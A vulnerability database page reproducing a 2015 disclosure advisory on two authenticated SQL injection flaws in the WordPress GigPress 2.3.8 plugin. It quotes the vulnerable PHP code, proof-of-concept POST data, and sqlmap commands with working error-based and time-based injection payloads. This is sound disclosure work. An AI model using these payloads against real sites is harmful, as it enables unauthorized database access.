Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WordPress GigPress 2.3.8 SQL Injection

🗓️ 25 May 2015 00:00:00Reported by Adrian M. F.Type 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 40 Views

WordPress GigPress 2.3.8 SQL Injection vulnerability in admin handler

Related
Code
ReporterTitlePublishedViews
Family
0day.today		WordPress GigPress 2.3.8 SQL Injection Vulnerability
26 May 201500:00
zdt
Circl		CVE-2015-4066
26 May 201500:00
circl
CNVD		Multiple SQL Injection Vulnerabilities in WordPress GigPress Plugin 'handlers.php'
21 May 201500:00
cnvd
CVE		CVE-2015-4066
27 May 201518:00
cve
Cvelist		CVE-2015-4066
27 May 201518:00
cvelist
Exploit DB		WordPress Plugin GigPress 2.3.8 - SQL Injection
26 May 201500:00
exploitdb
EUVD		EUVD-2015-4092
7 Oct 202500:30
euvd
exploitpack		WordPress Plugin GigPress 2.3.8 - SQL Injection
26 May 201500:00
exploitpack
NVD		CVE-2015-4066
27 May 201518:59
nvd
Prion		Sql injection
27 May 201518:59
prion
Rows per page
`# Title: SQLi vulnerabilities in WordPress plugin "GigPress"  
# Author: Adrián M. F. - adrimf85[at]gmail[dot]com  
# Date: 2015-05-25  
# Vendor Homepage: https://wordpress.org/plugins/gigpress/  
# Active installs: 20,000+  
# Vulnerable version: 2.3.8  
# Fixed version: 2.3.9  
# CVE: CVE-2015-4066  
  
Vulnerabilities (2)  
=====================  
  
(1) Authenticated SQLi [CWE-89]  
-------------------------------  
  
* CODE:  
admin/handlers.php:87  
+++++++++++++++++++++++++++++++++++++++++  
$show['show_tour_id'] = $_POST['show_tour_id'];  
+++++++++++++++++++++++++++++++++++++++++  
admin/handlers.php:94  
+++++++++++++++++++++++++++++++++++++++++  
$artist = $wpdb->get_var("SELECT artist_name FROM " . GIGPRESS_ARTISTS . " WHERE artist_id = " . $show['show_artist_id'] . "");  
+++++++++++++++++++++++++++++++++++++++++  
  
  
* POC:  
http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php  
POST DATA:  
_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1[SQLi]&show_venue_id=1&show_related=new  
  
SQLMap  
+++++++++++++++++++++++++++++++++++++++++  
./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php" --data="_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1&show_related=new" -p show_artist_id --dbms mysql  
[............]  
POST parameter 'show_artist_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]  
sqlmap identified the following injection points with a total of 72 HTTP(s) requests:  
---  
Parameter: show_artist_id (POST)  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause  
Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1 AND (SELECT 9266 FROM(SELECT COUNT(*),CONCAT(0x717a6a7a71,(SELECT (ELT(9266=9266,1))),0x71786a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&show_venue_id=1&show_related=new  
  
Type: AND/OR time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)  
Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))BiUm)&show_venue_id=1&show_related=new  
---  
[12:21:09] [INFO] the back-end DBMS is MySQL  
web server operating system: Linux Debian 7.0 (wheezy)  
web application technology: Apache 2.2.22, PHP 5.4.39  
back-end DBMS: MySQL 5.0  
+++++++++++++++++++++++++++++++++++++++++  
  
  
(2) Authenticated SQLi [CWE-89]  
-------------------------------  
  
* CODE:  
admin/handlers.php:71  
+++++++++++++++++++++++++++++++++++++++++  
$show['show_venue_id'] = $_POST['show_venue_id'];  
+++++++++++++++++++++++++++++++++++++++++  
admin/handlers.php:95  
+++++++++++++++++++++++++++++++++++++++++  
$venue = $wpdb->get_results("SELECT venue_name, venue_city FROM " . GIGPRESS_VENUES . " WHERE venue_id = " . $show['show_venue_id'] . "", ARRAY_A);  
+++++++++++++++++++++++++++++++++++++++++  
  
  
* POC:  
http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php  
POST DATA:  
_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1[SQLi]&show_related=new  
  
SQLMap  
+++++++++++++++++++++++++++++++++++++++++  
./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?page=gigpress/gigpress.php" --data="_wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1&show_related=new" -p show_venue_id --dbms mysql  
[............]  
POST parameter 'show_venue_id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]  
sqlmap identified the following injection points with a total of 72 HTTP(s) requests:  
---  
Parameter: show_venue_id (POST)  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause  
Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1 AND (SELECT 6543 FROM(SELECT COUNT(*),CONCAT(0x717a6a7a71,(SELECT (ELT(6543=6543,1))),0x71786a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&show_related=new  
  
Type: AND/OR time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)  
Payload: _wpnonce=b31c921d92&_wp_http_referer=/wordpress/wp-admin/admin.php?page=gigpress/gigpress.php&gpaction=add&show_status=active&gp_mm=05&gp_dd=05&gp_yy=2015&show_artist_id=1&show_venue_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))OzkE)&show_related=new  
---  
[12:23:57] [INFO] the back-end DBMS is MySQL  
web server operating system: Linux Debian 7.0 (wheezy)  
web application technology: Apache 2.2.22, PHP 5.4.39  
back-end DBMS: MySQL 5.0  
+++++++++++++++++++++++++++++++++++++++++  
  
  
Timeline  
========  
2015-05-09: Discovered vulnerability.  
2015-05-20: Vendor notification.  
2015-05-20: Vendor response and fix.  
2015-05-25: Public disclosure.  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 May 2015 00:00Current
0.6Low risk
Vulners AI Score0.6
EPSS0.02669
wordpressgigpresssql injectioncwe-89vulnerabilityadmin handlerssqlmapcve-2015-4066wordpress plugin
40